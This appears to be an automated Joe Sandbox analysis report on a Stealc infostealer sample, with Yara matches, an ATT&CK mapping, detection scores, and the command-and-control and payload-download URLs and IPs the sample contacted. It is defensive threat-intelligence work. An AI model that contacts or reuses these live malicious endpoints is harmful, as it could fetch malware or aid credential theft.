                    Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Stealc
                    Source: Yara matchFile source: 1.2.9B3F.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.9B3F.tmp.exe.b00e67.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.9B3F.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.3.9B3F.tmp.exe.2310000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.9B3F.tmp.exe.b00e67.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.3.9B3F.tmp.exe.2310000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1890384473.0000000002310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 9B3F.tmp.exe PID: 5440, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP

                    Remote Access Functionality

                    barindex
                    Yara detected Stealc
                    Source: Yara matchFile source: 1.2.9B3F.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.9B3F.tmp.exe.b00e67.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.9B3F.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.3.9B3F.tmp.exe.2310000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.9B3F.tmp.exe.b00e67.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.3.9B3F.tmp.exe.2310000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1890384473.0000000002310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 9B3F.tmp.exe PID: 5440, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004218EC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218EC
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_00420C16 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420C16
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04850E7D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_04850E7D
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04851B53 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_04851B53

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts13
                    Native API                    		1
                    DLL Side-Loading                    		111
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		21
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading                    		11
                    Virtualization/Sandbox Evasion                    		LSASS Memory1
                    Query Registry                    		Remote Desktop Protocol3
                    Clipboard Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                    Disable or Modify Tools                    		Security Account Manager31
                    Security Software Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                    Process Injection                    		NTDS11
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput Capture114
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets11
                    Process Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                    Obfuscated Files or Information                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                    Software Packing                    		DCSync1
                    Account Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc Filesystem1
                    System Owner/User Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow2
                    File and Directory Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing134
                    System Information Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    TP77MvSzt2.exe47%ReversingLabsWin32.Trojan.CrypterX
                    TP77MvSzt2.exe100%AviraHEUR/AGEN.1312567
                    TP77MvSzt2.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe100%Joe Sandbox ML

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://upx.sf.net0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    post-to-me.com
                    		104.21.56.70
                    		truefalse
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://62.204.41.177/edd20096ecef326d.phptrue
                        		unknown
                        https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                          		unknown
                          http://62.204.41.177/true
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://post-to-me.com/track_prt.php?sub=&cc=DETP77MvSzt2.exe, 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                              		unknown
                              http://176.113.115.37/ScreenUpdateSync.exenTP77MvSzt2.exe, 00000000.00000003.4081032702.0000000002E4B000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000002.4211126136.0000000002E4B000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000003.1836716816.0000000002E4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://post-to-me.com/track_prt.php?sub=TP77MvSzt2.exefalse
                                  		unknown
                                  https://post-to-me.com/track_prt.php?sub=0&cc=DE#TP77MvSzt2.exe, 00000000.00000003.4081032702.0000000002E25000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000002.4211126136.0000000002E26000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://62.204.41.177/edd20096ecef326d.php:Ic9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://176.113.115.37/ScreenUpdateSync.exeuTP77MvSzt2.exe, 00000000.00000003.1836716816.0000000002E4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://62.204.41.177/edd20096ecef326d.php~I9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWARETP77MvSzt2.exe, 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                            		unknown
                                            https://post-to-me.com/track_prt.php?sub=0&cc=DEOTP77MvSzt2.exe, 00000000.00000003.4081032702.0000000002E25000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000002.4211126136.0000000002E26000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://post-to-me.com/TP77MvSzt2.exe, 00000000.00000003.4081032702.0000000002E25000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000002.4211126136.0000000002E26000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://62.204.41.177/edd20096ecef326d.php_JP9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://upx.sf.netAmcache.hve.7.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://62.204.41.177/edd20096ecef326d.phpBH9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://62.204.41.177/edd20096ecef326d.phpNH9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://62.204.41.177;ah9B3F.tmp.exe, 00000001.00000002.2966662150.00000000008CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://176.113.115.37/ScreenUpdateSync.exeTP77MvSzt2.exe, 00000000.00000003.1836716816.0000000002E4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://62.204.41.177/ows9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://62.204.41.1779B3F.tmp.exe, 00000001.00000002.2966662150.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmptrue
                                                              		unknown
                                                              http://62.204.41.177/%9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                176.113.115.37
                                                                		unknownRussian Federation
                                                                		49505SELECTELRUfalse
                                                                62.204.41.177
                                                                		unknownUnited Kingdom
                                                                		30798TNNET-ASTNNetOyMainnetworkFItrue
                                                                104.21.56.70
                                                                		post-to-me.comUnited States
                                                                		13335CLOUDFLARENETUSfalse

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1542870
                                                                Start date and time:2024-10-26 19:07:18 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 8m 8s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:9
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:TP77MvSzt2.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:1e1e32d1eedb37a1e3c1ad488621b26f.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winEXE@4/7@1/3
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 98%
                                                                • Number of executed functions: 50
                                                                • Number of non-executed functions: 372
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 104.208.16.94
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: TP77MvSzt2.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                13:08:21API Interceptor8727932x Sleep call for process: TP77MvSzt2.exe modified
                                                                13:10:18API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                176.113.115.37jicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                                • 176.113.115.37/ScreenUpdateSync.exe
                                                                w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                                • 176.113.115.37/ScreenUpdateSync.exe
                                                                jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                                • 176.113.115.37/ScreenUpdateSync.exe
                                                                mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                                • 176.113.115.37/ScreenUpdateSync.exe
                                                                BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                                • 176.113.115.37/ScreenUpdateSync.exe
                                                                v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                                • 176.113.115.37/ScreenUpdateSync.exe
                                                                Zl5QaBwsTJ.exeGet hashmaliciousStealcBrowse
                                                                • 176.113.115.37/ScreenUpdateSync.exe
                                                                sgM0Akbldk.exeGet hashmaliciousStealcBrowse
                                                                • 176.113.115.37/ScreenUpdateSync.exe
                                                                VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                                                • 176.113.115.37/ScreenUpdateSync.exe
                                                                CHHE6LLjWx.exeGet hashmaliciousStealc, VidarBrowse
                                                                • 176.113.115.37/ScreenUpdateSync.exe
                                                                62.204.41.1771vYjXDbKHt.exeGet hashmaliciousStealcBrowse
                                                                • 62.204.41.177/edd20096ecef326d.php
                                                                716b3c89802c1713871667444720e62f3fc064c9910a1.exeGet hashmaliciousStealcBrowse
                                                                • 62.204.41.177/edd20096ecef326d.php
                                                                oqIz1tfl5h.exeGet hashmaliciousStealcBrowse
                                                                • 62.204.41.177/edd20096ecef326d.php
                                                                jicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                                • 62.204.41.177/edd20096ecef326d.php
                                                                c4da1217278a52b300055859db330a4a3dca4ad09fe56.exeGet hashmaliciousStealcBrowse
                                                                • 62.204.41.177/edd20096ecef326d.php
                                                                w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                                • 62.204.41.177/edd20096ecef326d.php
                                                                jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                                • 62.204.41.177/edd20096ecef326d.php
                                                                mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                                • 62.204.41.177/edd20096ecef326d.php
                                                                Ondso1o6Yz.exeGet hashmaliciousStealcBrowse
                                                                • 62.204.41.177/edd20096ecef326d.php
                                                                BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                                • 62.204.41.177/edd20096ecef326d.php
                                                                104.21.56.70jicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                                  jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                                    mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                                      BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                                        v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                                          Zl5QaBwsTJ.exeGet hashmaliciousStealcBrowse
                                                                            VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                                                              hlyG1m5UmO.exeGet hashmaliciousStealc, VidarBrowse

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                post-to-me.comjicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                                                • 104.21.56.70
                                                                                w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                                                • 172.67.179.207
                                                                                jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                                                • 104.21.56.70
                                                                                mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                                                • 104.21.56.70
                                                                                BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                                                • 104.21.56.70
                                                                                v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                                                • 104.21.56.70
                                                                                Zl5QaBwsTJ.exeGet hashmaliciousStealcBrowse
                                                                                • 104.21.56.70
                                                                                sgM0Akbldk.exeGet hashmaliciousStealcBrowse
                                                                                • 172.67.179.207
                                                                                VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                                                                • 104.21.56.70
                                                                                CHHE6LLjWx.exeGet hashmaliciousStealc, VidarBrowse
                                                                                • 172.67.179.207

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                CLOUDFLARENETUSZnPyVAOUBc.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                • 188.114.96.3
                                                                                jicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                                                • 104.21.56.70
                                                                                http://cio.krqe.com/gtdhffgjghfj3081868fB16927453Xe78849729yB17367Xb25vBr206268IGGet hashmaliciousUnknownBrowse
                                                                                • 172.67.189.243
                                                                                http://cio.krqe.com/gtdhffgjghfj3081868fB16927453Xe78849729yB17367Xb25vBr206268IGGet hashmaliciousUnknownBrowse
                                                                                • 172.67.189.243
                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.97.3
                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.97.3
                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                • 104.21.95.91
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.170.64
                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                • 104.21.95.91
                                                                                w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                                                • 172.67.179.207
                                                                                SELECTELRUjicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                                                • 176.113.115.37
                                                                                w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                                                • 176.113.115.37
                                                                                jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                                                • 176.113.115.37
                                                                                mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                                                • 176.113.115.37
                                                                                BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                                                • 176.113.115.37
                                                                                v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                                                • 176.113.115.37
                                                                                Zl5QaBwsTJ.exeGet hashmaliciousStealcBrowse
                                                                                • 176.113.115.37
                                                                                sgM0Akbldk.exeGet hashmaliciousStealcBrowse
                                                                                • 176.113.115.37
                                                                                VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                                                                • 176.113.115.37
                                                                                la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                • 92.53.102.17
                                                                                TNNET-ASTNNetOyMainnetworkFI1vYjXDbKHt.exeGet hashmaliciousStealcBrowse
                                                                                • 62.204.41.177
                                                                                716b3c89802c1713871667444720e62f3fc064c9910a1.exeGet hashmaliciousStealcBrowse
                                                                                • 62.204.41.177
                                                                                oqIz1tfl5h.exeGet hashmaliciousStealcBrowse
                                                                                • 62.204.41.177
                                                                                jicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                                                • 62.204.41.177
                                                                                c4da1217278a52b300055859db330a4a3dca4ad09fe56.exeGet hashmaliciousStealcBrowse
                                                                                • 62.204.41.177
                                                                                w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                                                • 62.204.41.177
                                                                                jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                                                • 62.204.41.177
                                                                                mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                                                • 62.204.41.177
                                                                                Ondso1o6Yz.exeGet hashmaliciousStealcBrowse
                                                                                • 62.204.41.177
                                                                                BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                                                • 62.204.41.177

                                                                                JA3 Fingerprints

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                37f463bf4616ecd445d4a1937da06e19jicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                                                • 104.21.56.70
                                                                                ae67deafb5d9386fbca3d4d728d79651daaa42eef8086.exeGet hashmaliciousStealc, VidarBrowse
                                                                                • 104.21.56.70
                                                                                w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                                                • 104.21.56.70
                                                                                jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                                                • 104.21.56.70
                                                                                1GeaC4QnFy.dllGet hashmaliciousCobaltStrikeBrowse
                                                                                • 104.21.56.70
                                                                                OyPpyRRqd8.dllGet hashmaliciousCobaltStrikeBrowse
                                                                                • 104.21.56.70
                                                                                mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                                                • 104.21.56.70
                                                                                H33UCslPzv.exeGet hashmaliciousXWormBrowse
                                                                                • 104.21.56.70
                                                                                factura Fvsae2400398241025.pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                • 104.21.56.70
                                                                                SecuriteInfo.com.Program.Unwanted.5510.8307.25058.exeGet hashmaliciousUnknownBrowse
                                                                                • 104.21.56.70

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_9B3F.tmp.exe_e95d69dd1c263f625dbdd8c1f29a502d88fbc8_bb09a85e_a5f03171-0ee3-41fc-b5fa-9883119bc31d\Report.wer

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):65536
                                                                                Entropy (8bit):0.9641649851616958
                                                                                Encrypted:false
                                                                                SSDEEP:192:YA20mV0n/m0jMhZrMZtzuiFCZ24IO89e:lNm2n/m0jjTzuiFCY4IO89
                                                                                MD5:BFD14B77AD7279CB5AF748E873BBDCCF
                                                                                SHA1:28C8A424B9376608FE64F8406CAB910B2567489F
                                                                                SHA-256:FEB72D988EBBBC92E9C3C6173631E94EFCF7D4196BB7D33C0D84B032AEAAA6F2
                                                                                SHA-512:E91633AA1DE57E1B40C4391EC4640A00A286992450E495B4547D66F030062BB34DD8FD7C7B54217856A86824EA940E7AF170DE1DAE2BB0B48B467A21AC177E91
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.4.3.6.1.1.4.6.6.8.1.5.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.4.3.6.1.1.5.6.2.1.2.7.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.f.0.3.1.7.1.-.0.e.e.3.-.4.1.f.c.-.b.5.f.a.-.9.8.8.3.1.1.9.b.c.3.1.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.0.8.b.a.5.1.1.-.f.c.a.0.-.4.3.8.d.-.a.b.3.9.-.d.4.4.7.8.3.4.b.d.a.1.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.9.B.3.F...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.4.0.-.0.0.0.1.-.0.0.1.4.-.3.a.d.7.-.9.4.a.b.c.9.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.c.4.c.f.4.0.9.f.3.a.b.3.c.0.0.6.3.9.5.d.6.e.3.7.5.d.d.5.d.7.d.0.0.0.0.f.f.f.f.!.0.0.0.0.7.5.f.7.b.1.8.9.5.b.d.9.7.b.6.c.f.c.b.9.a.a.0.c.5.e.8.3.d.e.9.f.b.4.2.4.c.b.b.0.!.9.B.3.F...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERA83F.tmp.dmp

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                File Type:Mini DuMP crash report, 14 streams, Sat Oct 26 17:08:35 2024, 0x1205a4 type
                                                                                Category:dropped
                                                                                Size (bytes):60594
                                                                                Entropy (8bit):1.925002194682353
                                                                                Encrypted:false
                                                                                SSDEEP:384:eZdPBFE5EEBboppOwUSBVPPbX/iGghWT7Z:e3B8EEBEppOhSfLqG3
                                                                                MD5:939D8378315D223B4A80F494676C5750
                                                                                SHA1:99E93186634AFFA13981A5062C7995FC97A829F0
                                                                                SHA-256:B5B78B4468E3952B1AB2CCA04F3FB93A2C368F64AA028EC7B9EB2C7936F267FA
                                                                                SHA-512:A2882B66D1AF857A5AA32D94269A6AB79B46B57E362078DDD923A7FF88D5986F3E39320ACD13900FC310C0A0AD0C611A348DE8E530EFD6C7E0700D89446B64AD
                                                                                Malicious:false
                                                                                Reputation:low
